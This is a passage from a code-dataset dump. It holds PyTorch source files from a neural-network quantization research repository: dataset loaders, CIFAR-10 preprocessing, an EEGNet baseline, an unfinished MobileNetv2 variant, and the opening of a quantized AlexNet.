"xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "../MobileNetv2/postprocess.py" }, { "alpha_fraction": 0.5848419070243835, "alphanum_fraction": 0.5899106860160828, "avg_line_length": 36.32432556152344, "blob_id": "4c0e167e07b30ebeb6c2eee617daf6c1983790aa", "content_id": "546564b6e4aad077e81a6df7aa5655e726342995", 
"detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4143, "license_type": "permissive", "max_line_length": 127, "num_lines": 111, "path": "/quantlab/ETHZ-CVL-AED/MeyerNet/preprocess.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "# Copyright (c) 2019 ETH Zurich, Lukas Cavigelli\n\nimport torchvision as tv\nimport pickle\nimport os\nimport numpy as np\nimport torch\n\nclass PickleDictionaryNumpyDataset(tv.datasets.VisionDataset):\n \"\"\"Looks for a train.pickle or test.pickle file within root. The file has \n to contain a dictionary with classes as keys and a numpy array with the \n data. First dimension of the numpy array is the sample index. \n \n Args:\n root (string): Root directory path.\n train (bool, default=True): defines whether to load the train or test set. \n transform (callable, optional): A function/transform that takes in\n a sample and returns a transformed version.\n E.g, ``transforms.RandomCrop`` for images.\n target_transform (callable, optional): A function/transform that takes\n in the target and transforms it.\n Attributes:\n classes (list): List of the class names.\n class_to_idx (dict): Dict with items (class_name, class_index).\n data (numpy array): All the data samples. First dim are different samples.\n targets (list): The class_index value for each image in the dataset.\n \"\"\"\n\n def __init__(self, root, train=True, transform=None, target_transform=None):\n super().__init__(root, transform=transform, \n target_transform=target_transform)\n \n self.train = train # training set or test set\n \n if self.train: \n path = os.path.join(root, 'train.pickle')\n else: \n path = os.path.join(root, 'test.pickle')\n \n with open(path, 'rb') as f:\n dataset = pickle.load(f)\n dataset = dataset.items()\n \n self.classes = [k for k, v in dataset] # assume: train set contains all classes\n self.classes.sort()\n self.class_to_idx = {cl: i for i, cl in enumerate(self.classes)}\n \n self.data = np.stack([v[i] for k, v in dataset for i in range(len(v))], axis=0) #np.concatenate(list(dataset.values()))\n \n self.targets = [self.class_to_idx[k] \n for k, v in dataset \n for i in range(len(v))]\n\n def __getitem__(self, index):\n \"\"\"\n Args:\n index (int): Index\n Returns:\n tuple: (sample, target) where target is class_index of the target class.\n \"\"\"\n sample = self.data[index]\n target = self.targets[index]\n \n if self.transform is not None:\n sample = self.transform(sample) # note: dimensionaility here is atypical (not 3 dims, only 2)\n if self.target_transform is not None:\n target = self.target_transform(target)\n \n return torch.from_numpy(sample).float().mul(1/2**15).unsqueeze(0).contiguous(), target\n\n def __len__(self):\n return len(self.data)\n\n\ndef _get_transforms(augment):\n assert(augment == False)\n # normMean = tuple([0]*64)\n # normStddev = tuple([2**16/2]*64)\n\n # train_t = tv.transforms.Compose([\n # tv.transforms.ToTensor(),\n # tv.transforms.Normalize(mean=normMean, std=normStddev)])\n # valid_t = tv.transforms.Compose([\n # tv.transforms.ToTensor(),\n # tv.transforms.Normalize(mean=normMean, std=normStddev)])\n # train_t = tv.transforms.Compose([tv.transforms.ToTensor()])\n # valid_t = tv.transforms.Compose([tv.transforms.ToTensor()])\n train_t = None\n valid_t = None\n \n if not augment:\n train_t = valid_t\n transforms = {\n 'training': train_t,\n 'validation': valid_t\n }\n return transforms\n\n\ndef load_data_sets(dir_data, data_config):\n \n augment = 
data_config['augment']\n \n transforms = _get_transforms(augment)\n \n trainset = PickleDictionaryNumpyDataset(dir_data, train=True, \n transform=transforms['training'])\n validset = PickleDictionaryNumpyDataset(dir_data, train=False, \n transform=transforms['validation'])\n\n return trainset, validset, None\n" }, { "alpha_fraction": 0.5056570768356323, "alphanum_fraction": 0.5282854437828064, "avg_line_length": 42.358489990234375, "blob_id": "a1cf4d3acc6cf1a588cc5b0d2a96a98b1d6cc51d", "content_id": "c859359317abbf7058036786ccde3721db7150c6", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2298, "license_type": "permissive", "max_line_length": 105, "num_lines": 53, "path": "/quantlab/CIFAR-10/VGG/preprocess.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "# Copyright (c) 2019 UniMoRe, Matteo Spallanzani\n\nimport torchvision\nfrom torchvision.transforms import RandomCrop, RandomHorizontalFlip, ToTensor, Normalize, Compose\n\nfrom quantlab.treat.data.split import transform_random_split\n\n\n_CIFAR10 = {\n 'Normalize': {\n 'mean': (0.4914, 0.4822, 0.4465),\n 'std': (0.2470, 0.2430, 0.2610)\n }\n}\n\n\ndef get_transforms(augment):\n train_t = Compose([RandomCrop(32, padding=4),\n RandomHorizontalFlip(),\n ToTensor(),\n Normalize(**_CIFAR10['Normalize'])])\n valid_t = Compose([ToTensor(),\n Normalize(**_CIFAR10['Normalize'])])\n if not augment:\n train_t = valid_t\n transforms = {\n 'training': train_t,\n 'validation': valid_t\n }\n return transforms\n\n\ndef load_data_sets(dir_data, data_config):\n transforms = get_transforms(data_config['augment'])\n trainvalid_set = torchvision.datasets.CIFAR10(root=dir_data, train=True, download=True)\n if 'useTestForVal' in data_config.keys() and data_config['useTestForVal'] == True:\n train_set, valid_set = transform_random_split(trainvalid_set, \n [len(trainvalid_set), 0],\n [transforms['training'], transforms['validation']])\n test_set = torchvision.datasets.CIFAR10(root=dir_data, train=False, \n download=True, \n transform=transforms['validation'])\n valid_set = test_set\n print('using test set for validation.')\n else:\n len_train = int(len(trainvalid_set) * (1.0 - data_config['valid_fraction']))\n train_set, valid_set = transform_random_split(trainvalid_set, \n [len_train, len(trainvalid_set) - len_train],\n [transforms['training'], transforms['validation']])\n test_set = torchvision.datasets.CIFAR10(root=dir_data, train=False, \n download=True, \n transform=transforms['validation'])\n return train_set, valid_set, test_set\n" }, { "alpha_fraction": 0.5035090446472168, "alphanum_fraction": 0.5347170233726501, "avg_line_length": 33.88020706176758, "blob_id": "a6503b7c5e1546357fd2c8e0ed1a051d6ec71f47", "content_id": "a9f7078d884f7aa9af1cc148a787a002dbdf3e1a", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6697, "license_type": "permissive", "max_line_length": 101, "num_lines": 192, "path": "/quantlab/BCI-CompIV-2a/EEGNet/eegnetbaseline.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "# Copyright (c) 2019 Tibor Schneider\n\nimport numpy as np\nimport torch as t\nimport torch.nn.functional as F\n\n\nclass EEGNetBaseline(t.nn.Module):\n \"\"\"\n EEGNet\n\n In order for the baseline to be launched with the same logic as the quantized models, an empty\n quantization scheme and an empty thermostat schedule needs to be configured.\n Use the following templates for the 
'net' and 'thermostat' configurations (for the \"net\" object,\n all params can be omitted to use the default ones):\n\n \"net\": {\n \"class\": \"EEGNetBaseline\",\n \"params\": {\n \"F1\": 8,\n \"D\": 2,\n \"F2\": 16,\n \"C\": 22,\n \"T\": 1125,\n \"N\": 4,\n \"p_dropout\": 0.5,\n \"activation\": \"relu\",\n \"dropout_type\": \"TimeDropout2D\",\n },\n \"pretrained\": null,\n \"loss_fn\": {\n \"class\": \"CrossEntropyLoss\",\n \"params\": {}\n }\n }\n\n \"thermostat\": {\n \"class\": \"EEGNetBaseline\",\n \"params\": {\n \"noise_schemes\": {},\n \"bindings\": []\n }\n }\n \"\"\"\n\n def __init__(self, F1=8, D=2, F2=None, C=22, T=1125, N=4, p_dropout=0.5, activation='relu',\n dropout_type='TimeDropout2D'):\n \"\"\"\n F1: Number of spectral filters\n D: Number of spacial filters (per spectral filter), F2 = F1 * D\n F2: Number or None. If None, then F2 = F1 * D\n C: Number of EEG channels\n T: Number of time samples\n N: Number of classes\n p_dropout: Dropout Probability\n activation: string, either 'elu' or 'relu'\n dropout_type: string, either 'dropout', 'SpatialDropout2d' or 'TimeDropout2D'\n \"\"\"\n super(EEGNetBaseline, self).__init__()\n\n # prepare network constants\n if F2 is None:\n F2 = F1 * D\n\n # check the activation input\n activation = activation.lower()\n assert activation in ['elu', 'relu']\n\n # Prepare Dropout Type\n if dropout_type.lower() == 'dropout':\n dropout = t.nn.Dropout\n elif dropout_type.lower() == 'spatialdropout2d':\n dropout = t.nn.Dropout2d\n elif dropout_type.lower() == 'timedropout2d':\n dropout = TimeDropout2d\n else:\n raise ValueError(\"dropout_type must be one of SpatialDropout2d, Dropout or \"\n \"WrongDropout2d\")\n\n # store local values\n self.F1, self.D, self.F2, self.C, self.T, self.N = (F1, D, F2, C, T, N)\n self.p_dropout, self.activation = (p_dropout, activation)\n\n # Number of input neurons to the final fully connected layer\n n_features = (T // 8) // 8\n\n # Block 1\n self.conv1_pad = t.nn.ZeroPad2d((31, 32, 0, 0))\n self.conv1 = t.nn.Conv2d(1, F1, (1, 64), bias=False)\n self.batch_norm1 = t.nn.BatchNorm2d(F1, momentum=0.01, eps=0.001)\n self.conv2 = t.nn.Conv2d(F1, D * F1, (C, 1), groups=F1, bias=False)\n self.batch_norm2 = t.nn.BatchNorm2d(D * F1, momentum=0.01, eps=0.001)\n self.activation1 = t.nn.ELU(inplace=True) if activation == 'elu' else t.nn.ReLU(inplace=True)\n self.pool1 = t.nn.AvgPool2d((1, 8))\n # self.dropout1 = dropout(p=p_dropout)\n self.dropout1 = t.nn.Dropout(p=p_dropout)\n\n # Block 2\n self.sep_conv_pad = t.nn.ZeroPad2d((7, 8, 0, 0))\n self.sep_conv1 = t.nn.Conv2d(D * F1, D * F1, (1, 16), groups=D * F1, bias=False)\n self.sep_conv2 = t.nn.Conv2d(D * F1, F2, (1, 1), bias=False)\n self.batch_norm3 = t.nn.BatchNorm2d(F2, momentum=0.01, eps=0.001)\n self.activation2 = t.nn.ELU(inplace=True) if activation == 'elu' else t.nn.ReLU(inplace=True)\n self.pool2 = t.nn.AvgPool2d((1, 8))\n self.dropout2 = dropout(p=p_dropout)\n\n # Fully connected layer (classifier)\n self.flatten = Flatten()\n self.fc = t.nn.Linear(F2 * n_features, N, bias=True)\n\n # initialize weights\n self._initialize_params()\n\n def forward(self, x, with_stats=False):\n\n # input dimensions: (s, 1, C, T)\n\n # Block 1\n x = self.conv1_pad(x)\n x = self.conv1(x) # output dim: (s, F1, C, T-1)\n x = self.batch_norm1(x)\n x = self.conv2(x) # output dim: (s, D * F1, 1, T-1)\n x = self.batch_norm2(x)\n x = self.activation1(x)\n x = self.pool1(x) # output dim: (s, D * F1, 1, T // 8)\n x = self.dropout1(x)\n\n # Block2\n x = self.sep_conv_pad(x)\n x = 
self.sep_conv1(x) # output dim: (s, D * F1, 1, T // 8 - 1)\n x = self.sep_conv2(x) # output dim: (s, F2, 1, T // 8 - 1)\n x = self.batch_norm3(x)\n x = self.activation2(x)\n x = self.pool2(x) # output dim: (s, F2, 1, T // 64)\n x = self.dropout2(x)\n\n # Classification\n x = self.flatten(x) # output dim: (s, F2 * (T // 64))\n x = self.fc(x) # output dim: (s, N)\n\n if with_stats:\n stats = [('conv1_w', self.conv1.weight.data),\n ('conv2_w', self.conv2.weight.data),\n ('sep_conv1_w', self.sep_conv1.weight.data),\n ('sep_conv2_w', self.sep_conv2.weight.data),\n ('fc_w', self.fc.weight.data),\n ('fc_b', self.fc.bias.data)]\n return stats, x\n return x\n\n def forward_with_tensor_stats(self, x):\n return self.forward(x, with_stats=True)\n\n def _initialize_params(self, weight_init=t.nn.init.xavier_uniform_, bias_init=t.nn.init.zeros_):\n \"\"\"\n Initializes all the parameters of the model\n\n Parameters:\n - weight_init: t.nn.init inplace function\n - bias_init: t.nn.init inplace function\n\n \"\"\"\n def init_weight(m):\n if isinstance(m, t.nn.Conv2d) or isinstance(m, t.nn.Linear):\n weight_init(m.weight)\n if isinstance(m, t.nn.Linear):\n bias_init(m.bias)\n\n self.apply(init_weight)\n\n\nclass TimeDropout2d(t.nn.Dropout2d):\n \"\"\"\n Dropout layer, where the last dimension is treated as channels\n \"\"\"\n def __init__(self, p=0.5, inplace=False):\n \"\"\"\n See t.nn.Dropout2d for parameters\n \"\"\"\n super(TimeDropout2d, self).__init__(p=p, inplace=inplace)\n\n def forward(self, input):\n if self.training:\n input = input.permute(0, 3, 1, 2)\n input = F.dropout2d(input, self.p, True, self.inplace)\n input = input.permute(0, 2, 3, 1)\n return input\n\n\nclass Flatten(t.nn.Module):\n def forward(self, input):\n return input.view(input.size(0), -1)\n" }, { "alpha_fraction": 0.5862069129943848, "alphanum_fraction": 0.6551724076271057, "avg_line_length": 29, "blob_id": "cbd95fb5f7b977f9eb12ffa4fb523c2ba9424fcb", "content_id": "fadf329eaec9905402517ab81f03fb437cfe9ba1", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 29, "license_type": "permissive", "max_line_length": 29, "num_lines": 1, "path": "/quantlab/ETHZ-CVL-AED/utils/meter.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "../../CIFAR-10/utils/meter.py" }, { "alpha_fraction": 0.5578778982162476, "alphanum_fraction": 0.6198146343231201, "avg_line_length": 61.08333206176758, "blob_id": "ef61aa5efd1b20fc1172fe7dee28eb914a67937b", "content_id": "f31bef75743d2912b083314f7b7c715b4a94e135", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 15645, "license_type": "permissive", "max_line_length": 139, "num_lines": 252, "path": "/quantlab/ImageNet/MobileNetv2/mobilenetv2residuals.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "# Copyright (c) 2019 UniMoRe, Matteo Spallanzani\n# Copyright (c) 2019 ETH Zurich, Lukas Cavigelli\n\nimport math\nimport torch.nn as nn\n\nfrom quantlab.indiv.stochastic_ops import StochasticActivation, StochasticLinear, StochasticConv2d\nfrom quantlab.indiv.inq_ops import INQController, INQLinear, INQConv2d\nfrom quantlab.indiv.ste_ops import STEActivation\n\nfrom quantlab.ImageNet.MobileNetv2.mobilenetv2baseline import MobileNetv2Baseline\n\nclass MobileNetv2Residuals(MobileNetv2Baseline):\n \"\"\"MobileNetv2 Convolutional Neural Network.\"\"\"\n def __init__(self, capacity=1, expansion=6, quant_schemes=None, \n quantAct=True, 
quantActSTENumLevels=None, quantWeights=True, \n weightInqSchedule=None, weightInqBits=2, weightInqStrategy=\"magnitude\", \n quantSkipFirstLayer=False):\n \n super().__init__(capacity, expansion)\n c0 = 3\n t0 = int(32 * capacity) * 1\n c1 = int(16 * capacity)\n t1 = c1 * expansion\n c2 = int(24 * capacity)\n t2 = c2 * expansion\n c3 = int(32 * capacity)\n t3 = c3 * expansion\n c4 = int(64 * capacity)\n t4 = c4 * expansion\n c5 = int(96 * capacity)\n t5 = c5 * expansion\n c6 = int(160 * capacity)\n t6 = c6 * expansion\n c7 = int(320 * capacity)\n c8 = max(int(1280 * capacity), 1280)\n \n \n def activ(name, nc):\n if quantAct:\n if quantActSTENumLevels != None and quantActSTENumLevels > 0: \n return STEActivation(startEpoch=0, \n numLevels=quantActSTENumLevels)\n else:\n return StochasticActivation(*quant_schemes[name], nc)\n else: \n assert(quantActSTENumLevels == None or quantActSTENumLevels <= 0)\n return nn.ReLU(inplace=True)\n \n def conv2d(name, ni, no, kernel_size=3, stride=1, padding=1, bias=False):\n if quantWeights:\n if weightInqSchedule == None:\n return StochasticConv2d(*quant_schemes[name], ni, no, \n kernel_size=kernel_size, stride=stride, \n padding=padding, bias=bias)\n else:\n return INQConv2d(ni, no, \n kernel_size=kernel_size, stride=stride, \n padding=padding, bias=bias, \n numBits=weightInqBits, strategy=weightInqStrategy)\n else: \n return nn.Conv2d(ni, no, \n kernel_size=kernel_size, stride=stride, \n padding=padding, bias=bias)\n \n def linear(name, ni, no, bias=False):\n if quantWeights:\n if weightInqSchedule == None:\n return StochasticLinear(*quant_schemes[name], ni, no, bias=bias)\n else:\n return INQLinear(ni, no, bias=bias, \n numBits=weightInqBits, strategy=weightInqStrategy)\n else: \n return nn.Linear(ni, no, bias=bias)\n \n assert(False) # IMPLEMENTATION INCOMPLETE!!!!\n \n # first block\n self.phi01_conv = nn.Conv2d(c0, t0, kernel_size=3, stride=2, padding=1, bias=False)\n self.phi01_bn = nn.BatchNorm2d(t0)\n self.phi01_act = nn.ReLU6(inplace=True)\n self.phi02_conv = nn.Conv2d(t0, t0, kernel_size=3, stride=1, padding=1, groups=t0, bias=False)\n self.phi02_bn = nn.BatchNorm2d(t0)\n self.phi02_act = nn.ReLU6(inplace=True)\n self.phi03_conv = nn.Conv2d(t0, c1, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi03_bn = nn.BatchNorm2d(c1)\n # second block\n self.phi04_conv = nn.Conv2d(c1, t1, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi04_bn = nn.BatchNorm2d(t1)\n self.phi04_act = nn.ReLU6(inplace=True)\n self.phi05_conv = nn.Conv2d(t1, t1, kernel_size=3, stride=2, padding=1, groups=t1, bias=False)\n self.phi05_bn = nn.BatchNorm2d(t1)\n self.phi05_act = nn.ReLU6(inplace=True)\n self.phi06_conv = nn.Conv2d(t1, c2, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi06_bn = nn.BatchNorm2d(c2)\n self.phi06_act = StochasticActivation(*quant_schemes['phi06_act'])\n self.phi07_conv = StochasticConv2d(*quant_schemes['phi07_conv'], c2, t2, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi07_bn = nn.BatchNorm2d(t2)\n self.phi07_act = StochasticActivation(*quant_schemes['phi07_act'])\n self.phi08_conv = StochasticConv2d(*quant_schemes['phi08_conv'], t2, t2, kernel_size=3, stride=1, padding=1, groups=t2, bias=False)\n self.phi08_bn = nn.BatchNorm2d(t2)\n self.phi08_act = StochasticActivation(*quant_schemes['phi08_act'])\n self.phi09_conv = StochasticConv2d(*quant_schemes['phi09_conv'], t2, c2, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi09_bn = nn.BatchNorm2d(c2)\n # third block\n self.phi10_conv = nn.Conv2d(c2, t2, 
kernel_size=1, stride=1, padding=0, bias=False)\n self.phi10_bn = nn.BatchNorm2d(t2)\n self.phi10_act = nn.ReLU6(inplace=True)\n self.phi11_conv = nn.Conv2d(t2, t2, kernel_size=3, stride=2, padding=1, groups=t2, bias=False)\n self.phi11_bn = nn.BatchNorm2d(t2)\n self.phi11_act = nn.ReLU6(inplace=True)\n self.phi12_conv = nn.Conv2d(t2, c3, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi12_bn = nn.BatchNorm2d(c3)\n self.phi12_act = StochasticActivation(*quant_schemes['phi12_act'])\n self.phi13_conv = StochasticConv2d(*quant_schemes['phi13_conv'], c3, t3, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi13_bn = nn.BatchNorm2d(t3)\n self.phi13_act = StochasticActivation(*quant_schemes['phi13_act'])\n self.phi14_conv = StochasticConv2d(*quant_schemes['phi14_conv'], t3, t3, kernel_size=3, stride=1, padding=1, groups=t3, bias=False)\n self.phi14_bn = nn.BatchNorm2d(t3)\n self.phi14_act = StochasticActivation(*quant_schemes['phi14_act'])\n self.phi15_conv = StochasticConv2d(*quant_schemes['phi15_conv'], t3, c3, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi15_bn = nn.BatchNorm2d(c3)\n self.phi15_act = StochasticActivation(*quant_schemes['phi15_act'])\n self.phi16_conv = StochasticConv2d(*quant_schemes['phi16_conv'], c3, t3, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi16_bn = nn.BatchNorm2d(t3)\n self.phi16_act = StochasticActivation(*quant_schemes['phi16_act'])\n self.phi17_conv = StochasticConv2d(*quant_schemes['phi17_conv'], t3, t3, kernel_size=3, stride=1, padding=1, groups=t3, bias=False)\n self.phi17_bn = nn.BatchNorm2d(t3)\n self.phi17_act = StochasticActivation(*quant_schemes['phi17_act'])\n self.phi18_conv = StochasticConv2d(*quant_schemes['phi18_conv'], t3, c3, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi18_bn = nn.BatchNorm2d(c3)\n # fourth block\n self.phi19_conv = nn.Conv2d(c3, t3, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi19_bn = nn.BatchNorm2d(t3)\n self.phi19_act = nn.ReLU6(inplace=True)\n self.phi20_conv = nn.Conv2d(t3, t3, kernel_size=3, stride=2, padding=1, groups=t3, bias=False)\n self.phi20_bn = nn.BatchNorm2d(t3)\n self.phi20_act = nn.ReLU6(inplace=True)\n self.phi21_conv = nn.Conv2d(t3, c4, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi21_bn = nn.BatchNorm2d(c4)\n self.phi21_act = StochasticActivation(*quant_schemes['phi21_act'])\n self.phi22_conv = StochasticConv2d(*quant_schemes['phi22_conv'], c4, t4, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi22_bn = nn.BatchNorm2d(t4)\n self.phi22_act = StochasticActivation(*quant_schemes['phi22_act'])\n self.phi23_conv = StochasticConv2d(*quant_schemes['phi23_conv'], t4, t4, kernel_size=3, stride=1, padding=1, groups=t4, bias=False)\n self.phi23_bn = nn.BatchNorm2d(t4)\n self.phi23_act = StochasticActivation(*quant_schemes['phi23_act'])\n self.phi24_conv = StochasticConv2d(*quant_schemes['phi24_conv'], t4, c4, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi24_bn = nn.BatchNorm2d(c4)\n self.phi24_act = StochasticActivation(*quant_schemes['phi24_act'])\n self.phi25_conv = StochasticConv2d(*quant_schemes['phi25_conv'], c4, t4, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi25_bn = nn.BatchNorm2d(t4)\n self.phi25_act = StochasticActivation(*quant_schemes['phi25_act'])\n self.phi26_conv = StochasticConv2d(*quant_schemes['phi26_conv'], t4, t4, kernel_size=3, stride=1, padding=1, groups=t4, bias=False)\n self.phi26_bn = nn.BatchNorm2d(t4)\n self.phi26_act = StochasticActivation(*quant_schemes['phi26_act'])\n 
self.phi27_conv = StochasticConv2d(*quant_schemes['phi27_conv'], t4, c4, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi27_bn = nn.BatchNorm2d(c4)\n self.phi27_act = StochasticActivation(*quant_schemes['phi27_act'])\n self.phi28_conv = StochasticConv2d(*quant_schemes['phi28_conv'], c4, t4, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi28_bn = nn.BatchNorm2d(t4)\n self.phi28_act = StochasticActivation(*quant_schemes['phi28_act'])\n self.phi29_conv = StochasticConv2d(*quant_schemes['phi29_conv'], t4, t4, kernel_size=3, stride=1, padding=1, groups=t4, bias=False)\n self.phi29_bn = nn.BatchNorm2d(t4)\n self.phi29_act = StochasticActivation(*quant_schemes['phi29_act'])\n self.phi30_conv = StochasticConv2d(*quant_schemes['phi30_conv'], t4, c4, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi30_bn = nn.BatchNorm2d(c4)\n # fifth block\n self.phi31_conv = nn.Conv2d(c4, t4, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi31_bn = nn.BatchNorm2d(t4)\n self.phi31_act = nn.ReLU6(inplace=True)\n self.phi32_conv = nn.Conv2d(t4, t4, kernel_size=3, stride=1, padding=1, groups=t4, bias=False)\n self.phi32_bn = nn.BatchNorm2d(t4)\n self.phi32_act = nn.ReLU6(inplace=True)\n self.phi33_conv = nn.Conv2d(t4, c5, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi33_bn = nn.BatchNorm2d(c5)\n self.phi33_act = StochasticActivation(*quant_schemes['phi33_act'])\n self.phi34_conv = StochasticConv2d(*quant_schemes['phi34_conv'], c5, t5, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi34_bn = nn.BatchNorm2d(t5)\n self.phi34_act = StochasticActivation(*quant_schemes['phi34_act'])\n self.phi35_conv = StochasticConv2d(*quant_schemes['phi35_conv'], t5, t5, kernel_size=3, stride=1, padding=1, groups=t5, bias=False)\n self.phi35_bn = nn.BatchNorm2d(t5)\n self.phi35_act = StochasticActivation(*quant_schemes['phi35_act'])\n self.phi36_conv = StochasticConv2d(*quant_schemes['phi36_conv'], t5, c5, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi36_bn = nn.BatchNorm2d(c5)\n self.phi36_act = StochasticActivation(*quant_schemes['phi36_act'])\n self.phi37_conv = StochasticConv2d(*quant_schemes['phi37_conv'], c5, t5, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi37_bn = nn.BatchNorm2d(t5)\n self.phi37_act = StochasticActivation(*quant_schemes['phi37_act'])\n self.phi38_conv = StochasticConv2d(*quant_schemes['phi38_conv'], t5, t5, kernel_size=3, stride=1, padding=1, groups=t5, bias=False)\n self.phi38_bn = nn.BatchNorm2d(t5)\n self.phi38_act = StochasticActivation(*quant_schemes['phi38_act'])\n self.phi39_conv = StochasticConv2d(*quant_schemes['phi39_conv'], t5, c5, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi39_bn = nn.BatchNorm2d(c5)\n # sixth block\n self.phi40_conv = nn.Conv2d(c5, t5, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi40_bn = nn.BatchNorm2d(t5)\n self.phi40_act = nn.ReLU6(inplace=True)\n self.phi41_conv = nn.Conv2d(t5, t5, kernel_size=3, stride=2, padding=1, groups=t5, bias=False)\n self.phi41_bn = nn.BatchNorm2d(t5)\n self.phi41_act = nn.ReLU6(inplace=True)\n self.phi42_conv = nn.Conv2d(t5, c6, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi42_bn = nn.BatchNorm2d(c6)\n self.phi42_act = StochasticActivation(*quant_schemes['phi42_act'])\n self.phi43_conv = StochasticConv2d(*quant_schemes['phi43_conv'], c6, t6, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi43_bn = nn.BatchNorm2d(t6)\n self.phi43_act = StochasticActivation(*quant_schemes['phi43_act'])\n self.phi44_conv = 
StochasticConv2d(*quant_schemes['phi44_conv'], t6, t6, kernel_size=3, stride=1, padding=1, groups=t6, bias=False)\n self.phi44_bn = nn.BatchNorm2d(t6)\n self.phi44_act = StochasticActivation(*quant_schemes['phi44_act'])\n self.phi45_conv = StochasticConv2d(*quant_schemes['phi45_conv'], t6, c6, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi45_bn = nn.BatchNorm2d(c6)\n self.phi45_act = StochasticActivation(*quant_schemes['phi45_act'])\n self.phi46_conv = StochasticConv2d(*quant_schemes['phi46_conv'], c6, t6, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi46_bn = nn.BatchNorm2d(t6)\n self.phi46_act = StochasticActivation(*quant_schemes['phi46_act'])\n self.phi47_conv = StochasticConv2d(*quant_schemes['phi47_conv'], t6, t6, kernel_size=3, stride=1, padding=1, groups=t6, bias=False)\n self.phi47_bn = nn.BatchNorm2d(t6)\n self.phi47_act = StochasticActivation(*quant_schemes['phi47_act'])\n self.phi48_conv = StochasticConv2d(*quant_schemes['phi48_conv'], t6, c6, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi48_bn = nn.BatchNorm2d(c6)\n # seventh block\n self.phi49_conv = nn.Conv2d(c6, t6, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi49_bn = nn.BatchNorm2d(t6)\n self.phi49_act = nn.ReLU6(inplace=True)\n self.phi50_conv = nn.Conv2d(t6, t6, kernel_size=3, stride=1, padding=1, groups=t6, bias=False)\n self.phi50_bn = nn.BatchNorm2d(t6)\n self.phi50_act = nn.ReLU6(inplace=True)\n self.phi51_conv = nn.Conv2d(t6, c7, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi51_bn = nn.BatchNorm2d(c7)\n # classifier\n self.phi52_conv = nn.Conv2d(c7, c8, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi52_bn = nn.BatchNorm2d(c8)\n self.phi52_act = nn.ReLU6(inplace=True)\n self.phi53_avg = nn.AvgPool2d(kernel_size=7, stride=1, padding=0)\n self.phi53_fc = nn.Linear(c8, 1000)\n\n self._initialize_weights()\n\n def _initialize_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(0, math.sqrt(2. 
/ n))\n if m.bias is not None:\n m.bias.data.zero_()\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n elif isinstance(m, nn.Linear):\n m.weight.data.normal_(0, 0.01)\n m.bias.data.zero_()\n" }, { "alpha_fraction": 0.48528891801834106, "alphanum_fraction": 0.5144747495651245, "avg_line_length": 40.54679870605469, "blob_id": "c2de4c2880ec1cac2a0da0b5962b8fafc2dff248", "content_id": "e070445ec87e5444cb540759f75f166c184a7d1b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8463, "license_type": "permissive", "max_line_length": 98, "num_lines": 203, "path": "/quantlab/ImageNet/AlexNet/alexnet.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "# Copyright (c) 2019 UniMoRe, Matteo Spallanzani\n# Copyright (c) 2019 ETH Zurich, Lukas Cavigelli\n\nimport torch\nimport torch.nn as nn\n\nfrom quantlab.indiv.stochastic_ops import StochasticActivation, StochasticLinear, StochasticConv2d\nfrom quantlab.indiv.inq_ops import INQController, INQLinear, INQConv2d\nfrom quantlab.indiv.ste_ops import STEActivation\n\n\nclass AlexNet(nn.Module):\n \"\"\"Quantized AlexNet (both weights and activations).\"\"\"\n def __init__(self, capacity=1, quant_schemes=None, \n quantAct=True, quantActSTENumLevels=None, quantWeights=True, \n weightInqSchedule=None, weightInqBits=None, weightInqLevels=None, \n weightInqStrategy=\"magnitude\", \n quantSkipFirstLayer=False, quantSkipLastLayer=False, \n withDropout=False, alternateSizes=False, weightInqQuantInit=None):\n \n super().__init__()\n \n assert(weightInqBits 